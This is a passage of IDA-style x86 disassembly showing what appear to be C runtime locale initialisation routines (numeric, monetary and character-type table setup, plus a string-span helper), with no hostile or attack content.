mov eax, [edx+40h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+44h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+48h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+4Ch]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+50h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+54h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+58h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+5Ch]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+64h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+68h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+6Ch]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+70h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+74h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+78h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+7Ch]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+80h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+84h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+88h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+8Ch]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+90h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+94h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+98h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+9Ch]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+0A0h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+0A4h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+0A8h]
push ecx
call sub_41CA10
add esp, 8
loc_4342E9: ; CODE XREF: sub_433FE0+9�j
pop ebp
retn
sub_433FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4342F0 proc near ; DATA XREF: _2:004542F8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
xor eax, eax
mov ax, ds:word_4F364A
mov [ebp+var_4], eax
cmp ds:dword_4F3400, 0
jz loc_43446A
push offset dword_4F3618
push 0Eh
mov ecx, [ebp+var_4]
push ecx
push 1
call sub_438A00
add esp, 10h
mov edx, [ebp+var_8]
or edx, eax
mov [ebp+var_8], edx
push offset dword_4F361C
push 0Fh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
push offset dword_4F3620
push 10h
mov edx, [ebp+var_4]
push edx
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, ds:dword_4F3620
push edx
call sub_4345A0
add esp, 4
cmp [ebp+var_8], 0
jz short loc_4343D9
push 2
mov eax, ds:dword_4F3618
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, ds:dword_4F361C
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, ds:dword_4F3620
push edx
call sub_41CA10
add esp, 8
mov ds:dword_4F3618, 0
mov ds:dword_4F361C, 0
mov ds:dword_4F3620, 0
or eax, 0FFFFFFFFh
jmp loc_434592
; ---------------------------------------------------------------------------
loc_4343D9: ; CODE XREF: sub_4342F0+8F�j
mov eax, ds:off_454E18
cmp dword ptr [eax], offset dword_454DE0
jz short loc_434420
push 2
mov ecx, ds:off_454E18
mov edx, [ecx]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, ds:off_454E18
mov ecx, [eax+4]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, ds:off_454E18
mov eax, [edx+8]
push eax
call sub_41CA10
add esp, 8
loc_434420: ; CODE XREF: sub_4342F0+F4�j
mov ecx, ds:off_454E18
mov edx, ds:dword_4F3618
mov [ecx], edx
mov eax, ds:off_454E18
mov ecx, ds:dword_4F361C
mov [eax+4], ecx
mov edx, ds:off_454E18
mov eax, ds:dword_4F3620
mov [edx+8], eax
mov ecx, ds:off_454E18
mov edx, [ecx]
mov al, [edx]
mov ds:byte_453DF4, al
mov ds:dword_453DF8, 1
xor eax, eax
jmp loc_434592
; ---------------------------------------------------------------------------
loc_43446A: ; CODE XREF: sub_4342F0+1F�j
push 2
mov ecx, ds:dword_4F3618
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, ds:dword_4F361C
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, ds:dword_4F3620
push eax
call sub_41CA10
add esp, 8
mov ds:dword_4F3618, 0
mov ds:dword_4F361C, 0
mov ds:dword_4F3620, 0
push 88h
push offset aInitnum_c ; "initnum.c"
push 2
push 2
call sub_41BE70
add esp, 10h
mov ecx, ds:off_454E18
mov [ecx], eax
mov edx, ds:off_454E18
cmp dword ptr [edx], 0
jnz short loc_4344EB
or eax, 0FFFFFFFFh
jmp loc_434592
; ---------------------------------------------------------------------------
loc_4344EB: ; CODE XREF: sub_4342F0+1F1�j
push offset a__4 ; "."
mov eax, ds:off_454E18
mov ecx, [eax]
push ecx
call sub_41F620
add esp, 8
push 8Dh
push offset aInitnum_c ; "initnum.c"
push 2
push 2
call sub_41BE70
add esp, 10h
mov edx, ds:off_454E18
mov [edx+4], eax
mov eax, ds:off_454E18
cmp dword ptr [eax+4], 0
jnz short loc_43452F
or eax, 0FFFFFFFFh
jmp short loc_434592
; ---------------------------------------------------------------------------
loc_43452F: ; CODE XREF: sub_4342F0+238�j
mov ecx, ds:off_454E18
mov edx, [ecx+4]
mov byte ptr [edx], 0
push 92h
push offset aInitnum_c ; "initnum.c"
push 2
push 2
call sub_41BE70
add esp, 10h
mov ecx, ds:off_454E18
mov [ecx+8], eax
mov edx, ds:off_454E18
cmp dword ptr [edx+8], 0
jnz short loc_43456B
or eax, 0FFFFFFFFh
jmp short loc_434592
; ---------------------------------------------------------------------------
loc_43456B: ; CODE XREF: sub_4342F0+274�j
mov eax, ds:off_454E18
mov ecx, [eax+8]
mov byte ptr [ecx], 0
mov edx, ds:off_454E18
mov eax, [edx]
mov cl, [eax]
mov ds:byte_453DF4, cl
mov ds:dword_453DF8, 1
xor eax, eax
loc_434592: ; CODE XREF: sub_4342F0+E4�j
; sub_4342F0+175�j ...
mov esp, ebp
pop ebp
retn
sub_4342F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4345A0 proc near ; CODE XREF: sub_4342F0+83�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
loc_4345A4: ; CODE XREF: sub_4345A0:loc_434617�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_434619
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
cmp eax, 30h
jl short loc_4345DD
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 39h
jg short loc_4345DD
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
sub ecx, 30h
mov edx, [ebp+arg_0]
mov [edx], cl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_434617
; ---------------------------------------------------------------------------
loc_4345DD: ; CODE XREF: sub_4345A0+17�j
; sub_4345A0+22�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 3Bh
jnz short loc_43460E
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4345EE: ; CODE XREF: sub_4345A0+6A�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov al, [edx+1]
mov [ecx], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_4345EE
jmp short loc_434617
; ---------------------------------------------------------------------------
loc_43460E: ; CODE XREF: sub_4345A0+46�j
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_434617: ; CODE XREF: sub_4345A0+3B�j
; sub_4345A0+6C�j
jmp short loc_4345A4
; ---------------------------------------------------------------------------
loc_434619: ; CODE XREF: sub_4345A0+C�j
mov esp, ebp
pop ebp
retn
sub_4345A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434620 proc near ; DATA XREF: _2:004542EC�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F33FC, 0
jz loc_4346EC
push 4Ah
push offset aInitmon_c ; "initmon.c"
push 2
push 30h
push 1
call sub_41C2D0
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_434659
mov eax, 1
jmp loc_43474C
; ---------------------------------------------------------------------------
loc_434659: ; CODE XREF: sub_434620+2D�j
mov eax, [ebp+var_4]
push eax
call sub_434750
add esp, 4
test eax, eax
jz short loc_43468D
mov ecx, [ebp+var_4]
push ecx
call sub_4349E0
add esp, 4
push 2
mov edx, [ebp+var_4]
push edx
call sub_41CA10
add esp, 8
mov eax, 1
jmp loc_43474C
; ---------------------------------------------------------------------------
loc_43468D: ; CODE XREF: sub_434620+47�j
mov eax, [ebp+var_4]
mov ecx, ds:off_454E18
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_4]
mov ecx, ds:off_454E18
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_4]
mov ecx, ds:off_454E18
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_4]
mov ds:off_454E18, eax
mov ecx, ds:dword_4F3624
push ecx
call sub_4349E0
add esp, 4
push 2
mov edx, ds:dword_4F3624
push edx
call sub_41CA10
add esp, 8
mov eax, [ebp+var_4]
mov ds:dword_4F3624, eax
xor eax, eax
jmp short loc_43474C
; ---------------------------------------------------------------------------
loc_4346EC: ; CODE XREF: sub_434620+B�j
mov ecx, ds:off_454E18
mov edx, [ecx]
mov ds:off_454DE8, edx
mov eax, ds:off_454E18
mov ecx, [eax+4]
mov ds:off_454DEC, ecx
mov edx, ds:off_454E18
mov eax, [edx+8]
mov ds:off_454DF0, eax
mov ds:off_454E18, offset off_454DE8
mov ecx, ds:dword_4F3624
push ecx
call sub_4349E0
add esp, 4
push 2
mov edx, ds:dword_4F3624
push edx
call sub_41CA10
add esp, 8
mov ds:dword_4F3624, 0
xor eax, eax
loc_43474C: ; CODE XREF: sub_434620+34�j
; sub_434620+68�j ...
mov esp, ebp
pop ebp
retn
sub_434620 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434750 proc near ; CODE XREF: sub_434620+3D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
xor eax, eax
mov ax, ds:word_4F3644
mov [ebp+var_4], eax
cmp [ebp+arg_0], 0
jnz short loc_434776
or eax, 0FFFFFFFFh
jmp loc_434959
; ---------------------------------------------------------------------------
loc_434776: ; CODE XREF: sub_434750+1C�j
mov ecx, [ebp+arg_0]
add ecx, 0Ch
push ecx
push 15h
mov edx, [ebp+var_4]
push edx
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 10h
push edx
push 14h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 14h
push edx
push 16h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 18h
push edx
push 17h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 1Ch
push edx
push 18h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
push eax
call sub_434960
add esp, 4
mov ecx, [ebp+arg_0]
add ecx, 20h
push ecx
push 50h
mov edx, [ebp+var_4]
push edx
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 24h
push edx
push 51h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 28h
push edx
push 1Ah
mov eax, [ebp+var_4]
push eax
push 0
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 29h
push edx
push 19h
mov eax, [ebp+var_4]
push eax
push 0
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Ah
push edx
push 54h
mov eax, [ebp+var_4]
push eax
push 0
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Bh
push edx
push 55h
mov eax, [ebp+var_4]
push eax
push 0
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Ch
push edx
push 56h
mov eax, [ebp+var_4]
push eax
push 0
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Dh
push edx
push 57h
mov eax, [ebp+var_4]
push eax
push 0
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Eh
push edx
push 52h
mov eax, [ebp+var_4]
push eax
push 0
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
add edx, 2Fh
push edx
push 53h
mov eax, [ebp+var_4]
push eax
push 0
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_8]
or ecx, eax
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
loc_434959: ; CODE XREF: sub_434750+21�j
mov esp, ebp
pop ebp
retn
sub_434750 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434960 proc near ; CODE XREF: sub_434750+C8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
loc_434964: ; CODE XREF: sub_434960:loc_4349D7�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_4349D9
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
cmp eax, 30h
jl short loc_43499D
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 39h
jg short loc_43499D
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
sub ecx, 30h
mov edx, [ebp+arg_0]
mov [edx], cl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_4349D7
; ---------------------------------------------------------------------------
loc_43499D: ; CODE XREF: sub_434960+17�j
; sub_434960+22�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 3Bh
jnz short loc_4349CE
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4349AE: ; CODE XREF: sub_434960+6A�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov al, [edx+1]
mov [ecx], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_4349AE
jmp short loc_4349D7
; ---------------------------------------------------------------------------
loc_4349CE: ; CODE XREF: sub_434960+46�j
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_4349D7: ; CODE XREF: sub_434960+3B�j
; sub_434960+6C�j
jmp short loc_434964
; ---------------------------------------------------------------------------
loc_4349D9: ; CODE XREF: sub_434960+C�j
mov esp, ebp
pop ebp
retn
sub_434960 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4349E0 proc near ; CODE XREF: sub_434620+4D�p
; sub_434620+A7�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jnz short loc_4349EE
jmp loc_434A71
; ---------------------------------------------------------------------------
loc_4349EE: ; CODE XREF: sub_4349E0+7�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+0Ch], offset dword_4F3684
jz short loc_434A71
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+18h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+20h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
call sub_41CA10
add esp, 8
loc_434A71: ; CODE XREF: sub_4349E0+9�j
; sub_4349E0+18�j
pop ebp
retn
sub_4349E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434A80 proc near ; DATA XREF: _2:004542E0�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
push ebp
mov ebp, esp
sub esp, 30h
mov [ebp+var_2C], 0
mov [ebp+var_28], 0
cmp ds:dword_4F33F8, 0
jz loc_434DD1
cmp ds:dword_4F3408, 0
jnz short loc_434AD0
push offset dword_4F3408
push 1004h
xor eax, eax
mov ax, ds:word_4F363C
push eax
push 0
call sub_438A00
add esp, 10h
test eax, eax
jz short loc_434AD0
jmp loc_434D92
; ---------------------------------------------------------------------------
loc_434AD0: ; CODE XREF: sub_434A80+28�j
; sub_434A80+49�j
push 5Ch
push offset aInitctyp_c ; "initctyp.c"
push 2
push 202h
call sub_41BE70
add esp, 10h
mov [ebp+var_30], eax
push 5Eh
push offset aInitctyp_c ; "initctyp.c"
push 2
push 202h
call sub_41BE70
add esp, 10h
mov [ebp+var_1C], eax
push 60h
push offset aInitctyp_c ; "initctyp.c"
push 2
push 101h
call sub_41BE70
add esp, 10h
mov [ebp+var_2C], eax
push 62h
push offset aInitctyp_c ; "initctyp.c"
push 2
push 202h
call sub_41BE70
add esp, 10h
mov [ebp+var_28], eax
cmp [ebp+var_30], 0
jz short loc_434B4C
cmp [ebp+var_1C], 0
jz short loc_434B4C
cmp [ebp+var_2C], 0
jz short loc_434B4C
cmp [ebp+var_28], 0
jnz short loc_434B51
loc_434B4C: ; CODE XREF: sub_434A80+B8�j
; sub_434A80+BE�j ...
jmp loc_434D92
; ---------------------------------------------------------------------------
loc_434B51: ; CODE XREF: sub_434A80+CA�j
mov ecx, [ebp+var_2C]
mov [ebp+var_18], ecx
mov [ebp+var_20], 0
jmp short loc_434B69
; ---------------------------------------------------------------------------
loc_434B60: ; CODE XREF: sub_434A80+103�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
loc_434B69: ; CODE XREF: sub_434A80+DE�j
cmp [ebp+var_20], 100h
jge short loc_434B85
mov eax, [ebp+var_18]
mov cl, byte ptr [ebp+var_20]
mov [eax], cl
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
jmp short loc_434B60
; ---------------------------------------------------------------------------
loc_434B85: ; CODE XREF: sub_434A80+F0�j
lea eax, [ebp+var_14]
push eax
mov ecx, ds:dword_4F3408
push ecx
call ds:dword_4F54E0 ; GetCPInfo
test eax, eax
jnz short loc_434B9F
jmp loc_434D92
; ---------------------------------------------------------------------------
loc_434B9F: ; CODE XREF: sub_434A80+118�j
cmp [ebp+var_14], 2
jbe short loc_434BAA
jmp loc_434D92
; ---------------------------------------------------------------------------
loc_434BAA: ; CODE XREF: sub_434A80+123�j
mov edx, [ebp+var_14]
and edx, 0FFFFh
mov ds:dword_453DF0, edx
cmp ds:dword_453DF0, 1
jle short loc_434C19
lea eax, [ebp+var_E]
mov [ebp+var_18], eax
jmp short loc_434BD3
; ---------------------------------------------------------------------------
loc_434BCA: ; CODE XREF: sub_434A80:loc_434C17�j
mov ecx, [ebp+var_18]
add ecx, 2
mov [ebp+var_18], ecx
loc_434BD3: ; CODE XREF: sub_434A80+148�j
mov edx, [ebp+var_18]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_434C19
mov ecx, [ebp+var_18]
xor edx, edx
mov dl, [ecx+1]
test edx, edx
jz short loc_434C19
mov eax, [ebp+var_18]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_20], ecx
jmp short loc_434BFF
; ---------------------------------------------------------------------------
loc_434BF6: ; CODE XREF: sub_434A80+195�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
loc_434BFF: ; CODE XREF: sub_434A80+174�j
mov eax, [ebp+var_18]
xor ecx, ecx
mov cl, [eax+1]
cmp [ebp+var_20], ecx
jg short loc_434C17
mov edx, [ebp+var_2C]
add edx, [ebp+var_20]
mov byte ptr [edx], 0
jmp short loc_434BF6
; ---------------------------------------------------------------------------
loc_434C17: ; CODE XREF: sub_434A80+18A�j
jmp short loc_434BCA
; ---------------------------------------------------------------------------
loc_434C19: ; CODE XREF: sub_434A80+140�j
; sub_434A80+15C�j ...
push 0
push 0
push 0
mov eax, [ebp+var_30]
add eax, 2
push eax
push 100h
mov ecx, [ebp+var_2C]
push ecx
push 1
call sub_431210
add esp, 1Ch
test eax, eax
jnz short loc_434C42
jmp loc_434D92
; ---------------------------------------------------------------------------
loc_434C42: ; CODE XREF: sub_434A80+1BB�j
mov edx, [ebp+var_30]
mov word ptr [edx], 0
mov eax, [ebp+var_28]
mov [ebp+var_24], eax
mov [ebp+var_20], 0
jmp short loc_434C62
; ---------------------------------------------------------------------------
loc_434C59: ; CODE XREF: sub_434A80+1FE�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
loc_434C62: ; CODE XREF: sub_434A80+1D7�j
cmp [ebp+var_20], 100h
jge short loc_434C80
mov edx, [ebp+var_24]
mov ax, word ptr [ebp+var_20]
mov [edx], ax
mov ecx, [ebp+var_24]
add ecx, 2
mov [ebp+var_24], ecx
jmp short loc_434C59
; ---------------------------------------------------------------------------
loc_434C80: ; CODE XREF: sub_434A80+1E9�j
push 0
push 0
mov edx, [ebp+var_1C]
add edx, 2
push edx
push 100h
mov eax, [ebp+var_28]
push eax
push 1
call sub_438CA0
add esp, 18h
test eax, eax
jnz short loc_434CA7
jmp loc_434D92
; ---------------------------------------------------------------------------
loc_434CA7: ; CODE XREF: sub_434A80+220�j
mov ecx, [ebp+var_1C]
mov word ptr [ecx], 0
cmp ds:dword_453DF0, 1
jle short loc_434D13
lea edx, [ebp+var_E]
mov [ebp+var_18], edx
jmp short loc_434CC9
; ---------------------------------------------------------------------------
loc_434CC0: ; CODE XREF: sub_434A80:loc_434D11�j
mov eax, [ebp+var_18]
add eax, 2
mov [ebp+var_18], eax
loc_434CC9: ; CODE XREF: sub_434A80+23E�j
mov ecx, [ebp+var_18]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_434D13
mov eax, [ebp+var_18]
xor ecx, ecx
mov cl, [eax+1]
test ecx, ecx
jz short loc_434D13
mov edx, [ebp+var_18]
xor eax, eax
mov al, [edx]
mov [ebp+var_20], eax
jmp short loc_434CF5
; ---------------------------------------------------------------------------
loc_434CEC: ; CODE XREF: sub_434A80+28F�j
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
loc_434CF5: ; CODE XREF: sub_434A80+26A�j
mov edx, [ebp+var_18]
xor eax, eax
mov al, [edx+1]
cmp [ebp+var_20], eax
jg short loc_434D11
mov ecx, [ebp+var_20]
mov edx, [ebp+var_30]
mov word ptr [edx+ecx*2+2], 8000h
jmp short loc_434CEC
; ---------------------------------------------------------------------------
loc_434D11: ; CODE XREF: sub_434A80+280�j
jmp short loc_434CC0
; ---------------------------------------------------------------------------
loc_434D13: ; CODE XREF: sub_434A80+236�j
; sub_434A80+252�j ...
mov eax, [ebp+var_30]
add eax, 2
mov ds:off_453BE4, eax
mov ecx, [ebp+var_1C]
add ecx, 2
mov ds:off_453BE8, ecx
cmp ds:dword_4F3628, 0
jz short loc_434D44
push 2
mov edx, ds:dword_4F3628
push edx
call sub_41CA10
add esp, 8
loc_434D44: ; CODE XREF: sub_434A80+2B1�j
mov eax, [ebp+var_30]
mov ds:dword_4F3628, eax
cmp ds:dword_4F362C, 0
jz short loc_434D66
push 2
mov ecx, ds:dword_4F362C
push ecx
call sub_41CA10
add esp, 8
loc_434D66: ; CODE XREF: sub_434A80+2D3�j
mov edx, [ebp+var_1C]
mov ds:dword_4F362C, edx
push 2
mov eax, [ebp+var_2C]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+var_28]
push ecx
call sub_41CA10
add esp, 8
xor eax, eax
jmp loc_434E1C
; ---------------------------------------------------------------------------
loc_434D92: ; CODE XREF: sub_434A80+4B�j
; sub_434A80:loc_434B4C�j ...
push 2
mov edx, [ebp+var_30]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+var_1C]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+var_2C]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+var_28]
push edx
call sub_41CA10
add esp, 8
mov eax, 1
jmp short loc_434E1C
; ---------------------------------------------------------------------------
loc_434DD1: ; CODE XREF: sub_434A80+1B�j
mov ds:off_453BE4, offset word_453BEE
mov ds:off_453BE8, offset word_453BEE
push 2
mov eax, ds:dword_4F3628
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, ds:dword_4F362C
push ecx
call sub_41CA10
add esp, 8
mov ds:dword_4F3628, 0
mov ds:dword_4F362C, 0
xor eax, eax
loc_434E1C: ; CODE XREF: sub_434A80+30D�j
; sub_434A80+34F�j
mov esp, ebp
pop ebp
retn
sub_434A80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434E20 proc near ; DATA XREF: _2:004542D4�o
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_434E20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434E30 proc near ; CODE XREF: _0:0042DC5E�p
; sub_42E310+7B�p
var_24 = dword ptr -24h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+arg_4]
lea ecx, [ecx+0]
loc_434E44: ; CODE XREF: sub_434E30+1F�j
mov al, [edx]
or al, al
jz short loc_434E51
inc edx
bts [esp+24h+var_24], eax
jmp short loc_434E44
; ---------------------------------------------------------------------------
loc_434E51: ; CODE XREF: sub_434E30+18�j
mov esi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
nop
loc_434E58: ; CODE XREF: sub_434E30+34�j
inc ecx
mov al, [esi]
or al, al
jz short loc_434E66
inc esi
bt [esp+24h+var_24], eax
jnb short loc_434E58
loc_434E66: ; CODE XREF: sub_434E30+2D�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
sub_434E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434E70 proc near ; CODE XREF: _0:0042DB7D�p
